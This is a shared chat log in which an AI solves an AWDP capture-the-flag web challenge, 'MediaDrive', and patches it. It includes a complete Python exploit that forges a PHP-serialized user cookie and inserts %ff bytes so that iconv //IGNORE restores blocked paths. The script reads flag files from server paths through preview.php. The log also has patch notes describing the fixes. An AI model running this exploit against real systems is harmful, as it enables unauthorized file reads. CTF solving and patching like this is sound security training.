logoChat01.ai

帮我完成一下这道AWDP的web题目,直接输出完整的flag获取代码,并且输出修复好的tar.gz文...

Created on: March 22, 2026

Answered using GPT-5.4 Thinking by Chat01

Question

MediaDrive.zip
read.txt

帮我完成一下这道AWDP的web题目,直接输出完整的flag获取代码,并且输出修复好的tar.gz文件

Question

MediaDrive.zip
read.txt

帮我完成一下这道AWDP的web题目,直接输出完整的flag获取代码,并且输出修复好的tar.gz文件

Thought

bash -lc cat > /mnt/data/MediaDrive_fixed/PATCH_NOTES.txt <<'TXT' MediaDrive security fixes:

  1. Removed insecure PHP object deserialization from the user cookie.
  2. Moved user preferences to a server-side session.
  3. Enforced an encoding allowlist during preference loading/saving.
  4. Replaced lossy iconv(..., //IGNORE) path conversion with strict conversion.
  5. Added centralized filename validation and upload-directory path resolution.
  6. Restricted preview/download to files inside /var/www/html/uploads/.
  7. Removed preview debug output that exposed internal filesystem paths. TXT cd /mnt/data && tar -czf MediaDrive_fixed.tar.gz -C /mnt/data/MediaDrive_fixed . && ls -lh /mnt/data/MediaDrive_fixed.tar.gz /mnt/data/get_flag.py

Thought for 8m 1s

Answer

这题的利用链就是:可伪造 user 对象 + preview.php 先黑名单后 iconv(..., "//IGNORE"),把插入的非法字节吞掉后还原出 /flag 路径。题面描述里提到的“用户偏好、文件路径转换以及文件预览”三段风险,正好对应这条链。(read.txt)

完整 flag 获取代码如下:

python
#!/usr/bin/env python3
import html
import re
import sys
import urllib.parse

import requests

TIMEOUT = 10


def php_string(value: str) -> str:
    return f's:{len(value.encode())}:"{value}";'


def forge_user_cookie(base_path: str = "/", encoding: str = "UTF-8", name: str = "guest") -> str:
    serialized = (
        'O:4:"User":3:{'
        f's:4:"name";{php_string(name)}'
        f's:8:"encoding";{php_string(encoding)}'
        f's:8:"basePath";{php_string(base_path)}'
        '}'
    )
    return urllib.parse.quote(serialized, safe='')


def obfuscate_flag_name(name: str) -> str:
    if not name:
        return name
    parts = []
    for i, ch in enumerate(name):
        parts.append(ch)
        if i != len(name) - 1:
            parts.append('%ff')
    return ''.join(parts)


def extract_preview_text(text: str) -> str:
    match = re.search(r'<pre[^>]*>(.*?)</pre>', text, re.I | re.S)
    if not match:
        return ''
    return html.unescape(match.group(1)).strip()


def main() -> int:
    if len(sys.argv) != 2:
        print(f'Usage: {sys.argv[0]} http://target:port')
        return 1

    base = sys.argv[1].rstrip('/')
    session = requests.Session()

    candidates = [
        ('/', 'flag'),
        ('/', 'flag.txt'),
        ('/var/www/', 'flag'),
        ('/var/www/', 'flag.txt'),
        ('/var/www/html/', 'flag'),
        ('/var/www/html/', 'flag.txt'),
        ('/app/', 'flag'),
        ('/app/', 'flag.txt'),
        ('/srv/', 'flag'),
        ('/srv/', 'flag.txt'),
        ('/tmp/', 'flag'),
        ('/tmp/', 'flag.txt'),
    ]

    for base_path, filename in candidates:
        cookie = forge_user_cookie(base_path=base_path, encoding='UTF-8', name='guest')
        url = f'{base}/preview.php?f={obfuscate_flag_name(filename)}'
        try:
            response = session.get(url, headers={'Cookie': f'user={cookie}'}, timeout=TIMEOUT)
        except requests.RequestException as exc:
            print(f'[-] Request failed: {exc}')
            return 3

        if response.status_code != 200:
            continue

        content = extract_preview_text(response.text)
        if not content:
            continue

        lowered = content.lower()
        if 'flag{' in lowered or 'ctf{' in lowered or 'awd{' in lowered:
            print(f'[+] basePath = {base_path}')
            print(f'[+] file     = {filename}')
            print('[+] flag:')
            print(content)
            return 0

        print(f'[+] Found readable candidate: {base_path}{filename}')
        print(content)
        return 0

    print('[-] Flag not found in common locations, extend the candidate list if needed.')
    return 2


if __name__ == '__main__':
    raise SystemExit(main())

文件我已经做好了:

get_flag.py

MediaDrive_fixed.tar.gz

修复包里已经处理了这几个点:去掉反序列化 cookie、改成服务端 session、去掉 //IGNORE 的宽松转换、统一做文件名校验和上传目录约束、移除预览页的内部路径泄露。

Share this Q&A